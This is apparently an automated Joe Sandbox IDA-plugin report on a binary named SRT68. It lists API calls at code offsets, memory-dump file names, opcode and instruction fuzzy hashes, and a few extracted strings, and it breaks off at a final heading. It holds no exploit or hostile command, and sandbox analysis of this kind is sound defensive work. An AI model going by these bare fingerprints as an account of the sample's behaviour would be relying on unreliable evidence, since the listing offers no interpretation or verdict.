                                                                      • Instruction ID: 2798de1dd123e797df6398bf4db45c764fe9ea074a0449f8e9a59333c3f2070c
                                                                      • Opcode Fuzzy Hash: 979eeefc760281c6b393736082df04dc98c36510c0278e931c81adf70d7ab76e
                                                                      • Instruction Fuzzy Hash: 5731D17190021DEBDB24CF68D94CAAE7BB5EF05365F104219FA25E62E0C7B49911DB90
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00FFB204
                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00FFB221
                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00FFB259
                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00FFB27F
                                                                      • _wcsstr.LIBCMT ref: 00FFB289
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                      • String ID:
                                                                      • API String ID: 3902887630-0
                                                                      • Opcode ID: 687ab36b8db4e707de6e87435779006bda72ad2ef1b6c834fa70c3df0affc717
                                                                      • Instruction ID: 71ae68e068da40715e8b090744fd934a5badbf032306bd915a355973ff91566c
                                                                      • Opcode Fuzzy Hash: 687ab36b8db4e707de6e87435779006bda72ad2ef1b6c834fa70c3df0affc717
                                                                      • Instruction Fuzzy Hash: 02210332604206AAEB265A35DC09F7F7BACDF49760F10802DF904DA161EF659C41A360
                                                                      APIs
                                                                        • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0102B192
                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0102B1B7
                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0102B1CF
                                                                      • GetSystemMetrics.USER32(00000004), ref: 0102B1F8
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,01010E90,00000000), ref: 0102B216
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$MetricsSystem
                                                                      • String ID:
                                                                      • API String ID: 2294984445-0
                                                                      • Opcode ID: f39ec7e51e5246a5b8318364301aed45cb95f5df63cb5976614b88cfc8cc9944
                                                                      • Instruction ID: c442da78625c6d4accc8f6c6c90cc6ab232f82f6806dd5725177ff3c9cf9757c
                                                                      • Opcode Fuzzy Hash: f39ec7e51e5246a5b8318364301aed45cb95f5df63cb5976614b88cfc8cc9944
                                                                      • Instruction Fuzzy Hash: 3C219171A10272AFDB709E3CDC04A6A3BA4FB06761F604768FAB6D71E0D73598118B90
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FF9320
                                                                        • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FF9352
                                                                      • __itow.LIBCMT ref: 00FF936A
                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FF9392
                                                                      • __itow.LIBCMT ref: 00FF93A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$__itow$_memmove
                                                                      • String ID:
                                                                      • API String ID: 2983881199-0
                                                                      • Opcode ID: aa413d98ee3e6cb165f5e9f1664c1ec331399a946d00e9723cf54c3b72532c57
                                                                      • Instruction ID: 83dc79de8007909d5e921ad974e8adde93957ea3d9e258e509ed9693f2b59d68
                                                                      • Opcode Fuzzy Hash: aa413d98ee3e6cb165f5e9f1664c1ec331399a946d00e9723cf54c3b72532c57
                                                                      • Instruction Fuzzy Hash: 9E212831B0420C6BDB20AE609C89FFE3BADEF49760F044029FA44DB191D6B58D44A791
                                                                      APIs
                                                                      • IsWindow.USER32(00000000), ref: 01015A6E
                                                                      • GetForegroundWindow.USER32 ref: 01015A85
                                                                      • GetDC.USER32(00000000), ref: 01015AC1
                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 01015ACD
                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 01015B08
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ForegroundPixelRelease
                                                                      • String ID:
                                                                      • API String ID: 4156661090-0
                                                                      • Opcode ID: a6a31692f0545441debc753509825d2bce1d8ac338d04ec5890616f195840e4b
                                                                      • Instruction ID: 07a2bd0286adcd8dc83758cfbc6c8fde50c4326746d8a50ca2b34c1ff94081aa
                                                                      • Opcode Fuzzy Hash: a6a31692f0545441debc753509825d2bce1d8ac338d04ec5890616f195840e4b
                                                                      • Instruction Fuzzy Hash: 9321A176A00204AFD720EF64DC88A9ABBF5FF89350F148079E889D7355CA78ED00DB90
                                                                      APIs
                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FA134D
                                                                      • SelectObject.GDI32(?,00000000), ref: 00FA135C
                                                                      • BeginPath.GDI32(?), ref: 00FA1373
                                                                      • SelectObject.GDI32(?,00000000), ref: 00FA139C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: c55dc24594bcdebea1c101dfe3618bdd75098fdd398e0ccdef4d4756cbcd8100
                                                                      • Instruction ID: 0e7f769080a3d4f7e4b2e1e5cac70e15d09b10ec3db4eb99a3307eb6288fc7e1
                                                                      • Opcode Fuzzy Hash: c55dc24594bcdebea1c101dfe3618bdd75098fdd398e0ccdef4d4756cbcd8100
                                                                      • Instruction Fuzzy Hash: 81215E71800309EFDF218F25DC4476D7BA8FB053A1F258216F890A69A4D77A9891EF90
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      • Opcode ID: 924fdfa53bb8811580b6aaf87bad3efb38b05b6562db186cdf04285ad6e8d851
                                                                      • Instruction ID: 13d7e091a19618ecbb322c7e269e11eb9f6216415c78340446abb16bcd22e096
                                                                      • Opcode Fuzzy Hash: 924fdfa53bb8811580b6aaf87bad3efb38b05b6562db186cdf04285ad6e8d851
                                                                      • Instruction Fuzzy Hash: CF0179B260010E7BE608AA12DD43FBB775CEE52798F044019FE0597313EB55DE15A2A1
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 01004ABA
                                                                      • __beginthreadex.LIBCMT ref: 01004AD8
                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 01004AED
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 01004B03
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 01004B0A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                      • String ID:
                                                                      • API String ID: 3824534824-0
                                                                      • Opcode ID: 572ea931e96b13ff1b542c0023ad842c47f66c99887c7469ac9f8bd87a3cbdad
                                                                      • Instruction ID: b7668618b6fa14e41339889a80eeb907bdd88daa4a202dcdf582359f2b691961
                                                                      • Opcode Fuzzy Hash: 572ea931e96b13ff1b542c0023ad842c47f66c99887c7469ac9f8bd87a3cbdad
                                                                      • Instruction Fuzzy Hash: FC112B76904206BBE7319FBCDC08B9F7FBCEB46364F244259F954D3294D67A890487A0
                                                                      APIs
                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FF821E
                                                                      • GetLastError.KERNEL32(?,00FF7CE2,?,?,?), ref: 00FF8228
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00FF7CE2,?,?,?), ref: 00FF8237
                                                                      • HeapAlloc.KERNEL32(00000000,?,00FF7CE2,?,?,?), ref: 00FF823E
                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FF8255
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 842720411-0
                                                                      • Opcode ID: e0ff212b101dab06361551dd1a8caf60abba0febbca0fb65b070a305d963caea
                                                                      • Instruction ID: 0c7b7cbaf7b0c46a37c0d7f8af8d275fa671ac9e9e7effa61fbfa81087841eb5
                                                                      • Opcode Fuzzy Hash: e0ff212b101dab06361551dd1a8caf60abba0febbca0fb65b070a305d963caea
                                                                      • Instruction Fuzzy Hash: 7D016D71600209BFDB305FA5DC48D6B7BBCEF8A7A4B600429F949C2220DB329C01DB60
                                                                      APIs
                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?,?,00FF7455), ref: 00FF7127
                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF7142
                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF7150
                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?), ref: 00FF7160
                                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF716C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3897988419-0
                                                                      • Opcode ID: c152f9d9bb3abb7b65b7953f1257af23b96cdc9566ed1d7253882df0e2a788f6
                                                                      • Instruction ID: e89ead9ae55496c3e5bd64be6e58260289b4b2ba79be9a0792a471673eb4ef7e
                                                                      • Opcode Fuzzy Hash: c152f9d9bb3abb7b65b7953f1257af23b96cdc9566ed1d7253882df0e2a788f6
                                                                      • Instruction Fuzzy Hash: 3D01D472A00319BBCB205F24DC44BAAFBBCEF44BA1F2000A4FE44D2224D776DD01A7A0
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 01005260
                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0100526E
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 01005276
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01005280
                                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010052BC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                      • String ID:
                                                                      • API String ID: 2833360925-0
                                                                      • Opcode ID: 0c895175183057d5471fb89a036ba47501ee12973da726028d1a33f6e83756d5
                                                                      • Instruction ID: d5a2af1e7cb9c9f741365accf5e54bf344affb8812d84a189f9999e58624aa3f
                                                                      • Opcode Fuzzy Hash: 0c895175183057d5471fb89a036ba47501ee12973da726028d1a33f6e83756d5
                                                                      • Instruction Fuzzy Hash: AF015735D0161EDBEF21EFE4EC48AEDBB78FF0A711F500086E981B2284CB3955508BA1
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FF8121
                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FF812B
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF813A
                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF8141
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF8157
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: 731649a91f643c8c9d775f84d2a334672d337edc0525dad981c3e501f4f3751c
                                                                      • Instruction ID: dce1406d85799f23b518ea20350535b7105abd32591a2bf042c44db63bf9f6fe
                                                                      • Opcode Fuzzy Hash: 731649a91f643c8c9d775f84d2a334672d337edc0525dad981c3e501f4f3751c
                                                                      • Instruction Fuzzy Hash: E7F04471600305AFE7311E65DC88E773BBCEF457A4B200115F685C6150CB659952DB60
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00FFC1F7
                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00FFC20E
                                                                      • MessageBeep.USER32(00000000), ref: 00FFC226
                                                                      • KillTimer.USER32(?,0000040A), ref: 00FFC242
                                                                      • EndDialog.USER32(?,00000001), ref: 00FFC25C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 3741023627-0
                                                                      • Opcode ID: 55771d784ae4b1523da8c566ab5c79c260fb364aef1b54b286cc79a92ddf6e15
                                                                      • Instruction ID: e717cee9fd89924df6c73072dde9885b20ca4235f1118462634a7e80fa27b2be
                                                                      • Opcode Fuzzy Hash: 55771d784ae4b1523da8c566ab5c79c260fb364aef1b54b286cc79a92ddf6e15
                                                                      • Instruction Fuzzy Hash: 5901A73040431D97EB305F60DD4EFA67778FF04B05F00025DE682A14E1DBE96948AB90
                                                                      APIs
                                                                      • EndPath.GDI32(?), ref: 00FA13BF
                                                                      • StrokeAndFillPath.GDI32(?,?,00FDB888,00000000,?), ref: 00FA13DB
                                                                      • SelectObject.GDI32(?,00000000), ref: 00FA13EE
                                                                      • DeleteObject.GDI32 ref: 00FA1401
                                                                      • StrokePath.GDI32(?), ref: 00FA141C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                      • String ID:
                                                                      • API String ID: 2625713937-0
                                                                      • Opcode ID: cdb3beba66225d3f7bc5106a2e293b3c40a96a025f193ebf62e33404110df5e1
                                                                      • Instruction ID: 57dc7cafb09e4d6a42daa2a0501f422c729ecf6cd4163000a60492c2e7bbee43
                                                                      • Opcode Fuzzy Hash: cdb3beba66225d3f7bc5106a2e293b3c40a96a025f193ebf62e33404110df5e1
                                                                      • Instruction Fuzzy Hash: A4F01D300003099FDB315F1AEC4C7583BB5BB023A6F188215F8A9584F8C73E4595DF10
                                                                      APIs
                                                                        • Part of subcall function 00FC0DB6: std::exception::exception.LIBCMT ref: 00FC0DEC
                                                                        • Part of subcall function 00FC0DB6: __CxxThrowException@8.LIBCMT ref: 00FC0E01
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                        • Part of subcall function 00FA7A51: _memmove.LIBCMT ref: 00FA7AAB
                                                                      • __swprintf.LIBCMT ref: 00FB2ECD
                                                                      Strings
                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00FB2D66
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                      • API String ID: 1943609520-557222456
                                                                      • Opcode ID: 7c72aad6f45af305fa90c652ba9c9776ed3eaf0f169f3f7e8bbfac6c44db7445
                                                                      • Instruction ID: cbcbbb46fdfa2388337bbf243c470aa018e705b290d34bb57fe6bce9651005a1
                                                                      • Opcode Fuzzy Hash: 7c72aad6f45af305fa90c652ba9c9776ed3eaf0f169f3f7e8bbfac6c44db7445
                                                                      • Instruction Fuzzy Hash: C8918C715083059FC714EF25CC86DAFB7A8EF9A760F00491DF4869B2A1DA38ED44EB52
                                                                      APIs
                                                                        • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
                                                                      • CoInitialize.OLE32(00000000), ref: 0100B9BB
                                                                      • CoCreateInstance.OLE32(01032D6C,00000000,00000001,01032BDC,?), ref: 0100B9D4
                                                                      • CoUninitialize.OLE32 ref: 0100B9F1
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                      • String ID: .lnk
                                                                      • API String ID: 2126378814-24824748
                                                                      • Opcode ID: 5d1dfefac1699368011a1beca95cabcfda3761c981eb9892defc8e9326414ef1
                                                                      • Instruction ID: f85eab9002cd2c7423c150ba8667785a6997044e334df7b2eb0244005ccd01b5
                                                                      • Opcode Fuzzy Hash: 5d1dfefac1699368011a1beca95cabcfda3761c981eb9892defc8e9326414ef1
                                                                      • Instruction Fuzzy Hash: 1EA166746043059FD711DF14C884D2ABBE5FF8A314F048998F8999B3A2CB75ED45CB92
                                                                      APIs
                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00FC50AD
                                                                        • Part of subcall function 00FD00F0: __87except.LIBCMT ref: 00FD012B
                                                                      Strings
                                                                      Memory Dump Source
